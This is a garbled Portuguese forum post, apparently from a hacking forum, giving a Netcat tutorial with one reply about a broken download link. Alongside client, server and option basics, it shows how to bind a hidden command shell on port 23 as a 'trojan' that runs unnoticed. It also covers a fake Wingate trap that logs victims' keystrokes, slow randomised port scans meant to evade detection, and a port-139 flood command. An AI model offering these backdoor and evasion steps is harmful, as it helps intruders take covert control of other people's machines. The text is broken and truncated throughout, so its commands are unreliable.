Beruflich Dokumente
Kultur Dokumente
Pesquisar:
Painel de Controle Ajuda - Como Ultilizar o Frum Membros Calendrio Novos Posts Pesquisar
Links Rpidos
Sair
Bem-vindo(a), mapa.
Suas Notificaes : 7 Ver Avatar Clique aqui para editar
perfil Clique aqui para ver ltimos mapa, Voc Bem Vindo ao Frum do Guia do Hacker em 528 dias voc ainda no comentou e nem postou? posts
Qual o problema, no tenha vergonha aqui ningum sabe mais que os outros, estamos aqui para trocar conhecimentos, no se sinta pressionado por est mensagem, s quero deixar bem claro que aqui ningum melhor que ningum. Abraos de Toda Equipe Guia do Hacker Frum do Guia do Hacker Segurana Digital e Hacking rea Hacker Matrias/Tutoriais/Dicas e Dvidas NetCAT Comandos e conceitos Matrias/Tutoriais/Dicas e Dvidas Somente matrias, tutoriais e dicas hacking.
Compartilhar |
Ferramentas do Tpico
Pesquisar no Tpico
Avaliar Tpico
Modos de Exibio
Breno Guest
Tutorial Netcat
Netcat uma ferramenta usada para ler e escrever dados em conexes de red TCP/IP. Dada sua grande versatilidade, o NetCat considerado pelos hackers o canivet TCP/IP,podendo ser usado para fazer desde portscans at brute force attacks. Em primeiro lugar, aconselho vocs a pegar o programa, assim ser feito Download link:Para Windows Cdigo: http://www.vulnwatch.org/netcat/nc111nt.zip
Status: Guest
A maioria das distros linux j vem com essa ferramenta pr-instalada,mas cas baixa-l em Download link:Para Linux Cdigo:
Posts: n/a
http://www.vulnwatch.org/netcat/nc110.tgz
O nome netcat vem do comando cat do Linux/Unix. O cat concatena arquivos e padro (stdout).O netcat faz praticamente o mesmo, porm ao invs de concat concatena sockets TCP e UDP. Opes do Netcat: -e comando Executa o comando especificado usando como entrada (stdin) os d e enviando os dados desada (stdout e stderr) para a rede. Essa opo somente for compilado com a opo GAPING_SECURITY_HOLE, j que permite que usu programas para qualquer um conectado a rede. -i Especifica o intervalo de tempo no qual as linhas de texto sero enviadas ou -l Coloca no netcat em estado de escuta (listening) -L Coloca no netcat em estado de escuta (listening), reiniciando o netcat com a comando caso a conexo feche. -n Fora o netcat a usar apenas endereos de IP numricos, sem fazer consul -o filename Usado para obter um log dos dados de entrada ou sada, em forma -p Especifica a porta a ser usada, sujeito a disponibilidade e a restries de pri -r Faz as portas do portscan serem escolhidas aleatriamente; -s Especifica o endereo IP da interface usada para enviar os pacotes. Pode se IPs, bastandoapenas configurar uma interface do tipo eth0:0 (usando o ifconf -t Permite usar o nc para criar sesses de telnet por script. Precisa estar comp -DTELNET; -u Usar UDP ao invs de TCP -v Controla o nvel de mensagens mostradas na tela; -w Limita o tempo mximo para que uma conexo seja estabelecida; -z Para evitar o envio de dados atravs de uma conexo TCP, e limitar os dados
Preparando as Interfaces de Rede Para testar o netcat, usaremos dois aliases na interface loopback (lo) do linux. interface (lo) no linux 127.0.0.1. Se mexermos com o endereo 127.0.0.1 podemos quebrar as nossas conexes usaremos os aliases "lo:1" e "lo:2" para executarmos os testes. Para atribuir endereos IP essas interfaces, os seguintes comandos devem s usurio root) no console do linux se for para windows deixe como esta. Cdigo:
O NetCat um famoso utilitrio que funciona com linha de comandos e que lh tudo o que voce quiser com sockets.Um socket simplesmente uma conexo e Para identificar um socket, precisa-se de 3 informaes: - os IPs dos 2 computadores conectados; - as portas nas quais os 2 computadores esto conectados; - o protocolo utilizado. Por exemplo: quando estou no IRC, no #iga, meu mIRC usa um socket entre m 165.169.45.12) e uma porta temporria (ex : 1035) e o IP do servidor (antwerp a porta do servidor (6667). E neste caso a conexo do tipo TCP.
As vantagens de NetCat? Ele permite fazer de forma fcil qualquer tipo de conexo (TCP ou UDP) sem s para criar pequenos clientes/servidores, quanto testar seus programas!o NC e (Windows 95/98, NT, Linux, Unix,...). usa-se com linhas de comandos o que vai permitir incorpora-lo em seus script enfim a ferramenta tima vamos mostrar a vocs alguns detalhes para que funciona esta maravilhosa ferramenta!
NETCAT CLIENT suponhhamos que eu quero me conectar no IRC. Coloco o seguinte comando ~> NETCAT antwerpen.be.eu.undernet.org 6667 E pronto! To conectado no servidor antwerpen!Tudo o que vc teclar depois ser mandad socket,em direo a antwerpen. simples no? (: Ele vai simplesmente permitir gerenciar um socket.Mandar... Receber... Nada que ele no conhece nenhum protocolo como IRC, FTP, etc...Mas isso quer tam mostrar exatamente o que vai acontecer durante a conexo, que no efetua n que vai mandar exatamente o que ns queremos que ele mande. o Telnet faz a mesma coisa...sim mas com varias infirmaes que no sero n trabalho. Telnet manda um monte de porcarias sem voc saber!Justamente, se falando possibilidade de emular a negociao Telnet. ou seja o netCat permite justame Telnet que vai tambm mandar todas as outroas info invalidas que disse.... Para fazer isso simples usaremos no Nc o seguinte comando onde ~> NETCAT -t 23 em uma begociao com nc voce "v" as informaes que manda ... roX no?
NETCAT SERVIDOR Agora que a gente mexeu um pouco pra ver o que NetCat faz em modo cliente socket :P,e como fazer tal coneco vamos tentar fazer um pequeno servidor.
como exemplo vamos abrir na nossa mquina a porta 23 e fazer com que a vit ache que caiu num "wingate". para isso usaremos o exemplo citado com o seguinte comando... ~> NETCAT -l -p 23 onde -l para dizer que estamos em modo listen(esperamos uma conexo num 23 para dizer que a porta na qual esperamos a conexo a porta 23.(: Agora vamos abrir nosso cliente Telnet e vamos nos conectar no nosso IP port vamos conectar o Telnet do Windows, "telnet 127.0.0.1 23". E o que ns observ O nosso cliente Telnet se conectou de fato ao nosso pequeno servidor... Agora vamos digitar uma pequena frase no nosso NetCat e como por mgica a Telnet. J que a gente ta no Telnet vamos digitar uma frase nele e..! Ela no aparece frase?Contudo, se voc verificar na tela do NetCat, vai ver que ele recebeu a n LOL,maravilhosa ferramenta no? Agora desconectamos o Telnet e Netcat desconecta tambm. No muito prtico um servidor que cai aps uma conexo!!! Para isso existe outro comando: ~> NETCAT -L -p 23 Desta vez, -L diz ao NetCat que deve esperar por conexes em permanncia. No? em palavras pode pareer muito complicado mas na pratica muito simples .e com o mesmo Digitamos o seguinte: ~> NETCAT -l -p 80 e abrimos o Internet Explorer no endereo seguinte "http Olhando melhor as informaes que o browser envia ao servidor Web (neste caso o NetCat) d para entender melhor como fazem para saber tudo o que rod na Microsoft! mas para voltar ao wingate, se devo a cada vez que se abra uma conexo digita simular um Wingate, vai ogo parecer suspeito e sobretudo vai me encher mui a que aparece todo o gnio do NetCat.
REDIRECIONAMENTO ENTRADA/SADA Pelo fato que utilizado com linhas de comando atravs de parmetros, NetCat vai nos permitir facilmente programa-lo e usa-lo em pequenos scripts (tanto em batch com LINUX quanto em bat em Dos/Windows). Vamos criar um pequeno arquivo Wingate.txt, que contem a linha seguinte: ~> Wingate> Depois lanamos o comando ~> NETCAT -L -p 23 < wingate.txt Agora vamos conectar o cliente Telnet. E como por mgica , o que que acontece? NetCat, ao invs de receber os com busca-los no nosso arquivo Wingate.txt e os manda assim por completo. No genial?E se ns qu est sendo digitado no nosso falso Wingate? simples ^^ no final do arquivo co e o comando para logs ficara da seguinte forma.. ~> NETCAT -L -p 23 > wingate.log E a armadilha est lanada!mas no sei mudar o arquivo texto uma vez o prog coisas ainda... Ento no to bom assim.Agora, vamos tentar programar um vai nos permitir controlar nossa mquina distncia ou seja " remotamente"!
NetCat permite um redirecionamento a partir de um arquivo, na entrada ou n permite tambm redirecionamento de entradas e sadas de um programa em Digitamos ento o seguinte comando ~> NETCAT -L -p 23 -e c:\command.com Depois lanamos "Telnet 127.0.0.1 23". E o nosso comand.com aparece na jan Ento se voc pensar bem e se souber programar em GWBasic (lanado em 18 comandos PRINT e INPUT, vai saber criar sem dificuldades um Shell bem bon Windows.isso no necessario mas ajuda... Na realidade, graas a esta opo, se souber fazer um programa que usa as in entrada e sada (em Pascal, em C, ...), no ter mais que se ocupar da program Basta digitar os dados e ser o NetCat que ir cuidar de gerenciar tudo.Outra somente para windows (acho que a nica, amante do Linux no ficam tristes vamos mostrar como seria um processo de um trojan que tal colocar uma she remotamente? ento faa o seguinte comando ~> NETCAT -L -p 23 -d -e c:\command.com Agora lanamos Telnet.Telnet se conecta!!! A opo d faz com que ele que ativo na memria (d pra ver na lista de tare "processos" se no souber o que isso se mata!) mas no na lista de janelas. Para fazer um trojan num computador, basta lanar este comando quando a m um servidor se instalar tranqilamente na porta 23 sem ningum perceber! "conhecimento no crime "
HACKING COM NETCAT Como NetCat uma ferramenta multiuso, pode fazer coisas boas..e ruins!!! NetCat contm uma serie de opes feitas para o scanning. Escanear antes de qualquer coisa tentar ver quais so os servios disponvei mquina distante. Fazer isso no nada complicado (: Na realidade basta digitar uma serie de po porta s. Por exemplo, se vc digitar 1-100, NetCat vai abrir conexes nas portas de 1 a 1 NetCat no nos indica o nmero da porta aberta. Ento devemos tambm utilizar o comando v e melhor ainda 2 x, -vv, para ob as conexes. utilizando o mesmo processo duas x LOL Digitamos por exemplo ento o seguinte comando. ~> NETCAT -vv 127.0.0.1 1-100 Este comando vai escanear as portas 1 a 100 do seu computador. Uma vez lanado, voc vai ver que NetCat mostra mensagens do tipo refused esto abertas e que ele mostra entre parnteses o servio que est presente ( especco). Se a porta est aberta, NetCat mostra a mensagem OPEN. Tem escanea de cima para baixo. Por exemplo, se vc entrar as portas 1-100, ele vai escanear 100, 99 98, ..., 3, 2, 1. Para mudar isso existe uma opo bem legal, -r. Tente digitar o seguinte comando e observe. ~> NETCAT -vv -r 127.0.0.1 100-110
Vai ver que NetCat escanea agora as portas completamente ao acaso no interv muito interessante, no ? De fato, muitos sistemas de proteo de scan so b de escaneamento de portas consecutivas. NetCat no limitado, podemos entrar uma lista de portas.Por exemplo, pode maneira: ~> NETCAT -vv -r 127.0.0.1 1-1024 4900-5000 6667 Neste caso, NetCat vai escanear as portas 1 a 1024, as portas 4900 a 5000 e a p bom observar que NetCat no trabalha por range; isto , Netcat vai escanear t 1024 ao acaso, depois vai passar ao range seguinte, e no escanear todas as por ordem qualquer. Na realidade, neste caso preciso, assim que NetCat encontrar uma porta aber mandar dados a esta porta. Para efetuar um scan rpido que no pra se a por devemos usar o switch z. xD ento o seguinte comando ficaria assim.,.. ~> NETCAT -vv -r -z 127.0.0.1 130-140 Ao nvel das portas, NetCat suporta o envio a vrias portas em paralelo ( assim escanear, de fato), mas podemos tambm usar isso para um Flood. Por exemplo, podemos digitar o comando seguinte: NETCAT 127.0.0.1 139 139 139 139 139 139 139 139 139 139 Bem, acho que tudo o que posso falar sobre escaneamento de portas.
OUTROS TRUQUES A primeira coisa que todas as opes que eu citei podem ser combinadas fac cliente quanto em modo servidor ou em modo scan. Por exemplo, podemos abrir uma conexo em direo a um servidor especifica cliente. para isso digitamos o seguinte comando ~> NETCAT -p 65000 www.antwerpen.be.eu.undernet.org 6667 Neste caso por exemplo, vai permitir ao cliente estar conectado ao port local n alta que no vai ser to evidente se quiserem tentar desconectar voc com um normalmente ataca as portas temporrias que vo de 1024 a 5000.NetCat poss interessante. Trata-se da funo u. Esta opo permite criar um socket UDP no lugar de um TCP. O mais interessante provavelmente escanear portas UDP ao invs das TCP u De fato no existem muitos scanners bons para UDP Em contra partida, existe so implementados em portas UDP (DNS, TFTP,...).
Existe tambm a opo de time-out w. que ficaria assim ~> NETCAT -w 5 antwerpen.be.eu.undernet.org 6667 Isso vai parar o NetCat aps 5 segundos caso a conexo no for estabelecida.H que vai especicar o tempo de scan, para no escanear muito rpido (o que pa facilmente detectvel). Por exemplo, para escanear de maneira mais sutil, podemos usar o comando s ~> NETCAT -vv -z -i 10000 -r 127.0.0.1 1-200 que vai escanear a cada 10000 milisegundos (a cada 10 segundos) uma porta e mquina 127.0.0.1, de 1 a 200.Uma outra opo interessante como debugger d analisar protocolos, a opo -o.
o comando ficaria assim ~> NETCAT -o netbios.log 127.0.0.1 139 NetCat vai loggar dentro do arquivo netbios.log todos os octets recebidos, mas hexadecimal, o que muito prtico em certos casos.Para aqueles que conhece tem tambm uma opo que permite enviar packets source-routed; ou seja, enviados por roteadores dos quais se deve especicar os IPs graas s opes suporta tambm a escolha de um IP no caso de um computador estar ligado a diferentes. Para terminar, se vc tiver um pequeno problema, digite o comando ~> NETCAT h e ter um resume de todos os comandos disponveis. Aconselh arquivo .txt fornecido com NetCat que explica um monte de truques interessa testados.
31-08-2009, 05:57 PM
#2
Bruno
Membro parece estranho mas o donwload n comea =/ pode me dizer mue erro ? __________________
Status: Membro Registrado em: Jul 2009 Localizao: Maquin Posts: 113
Tags
Editar Tags
Nenhum(a)
Resposta Rpida
Mensagem:
Opes
Colocar mensagem de origem (citao) na resposta?
Voc pode postar respostas Voc pode postar anexos Voc no pode editar seus posts Cdigo BB Sim Smiles: Sim Cdigo [IMG] Sim Cdigo HTML No Regras do Frum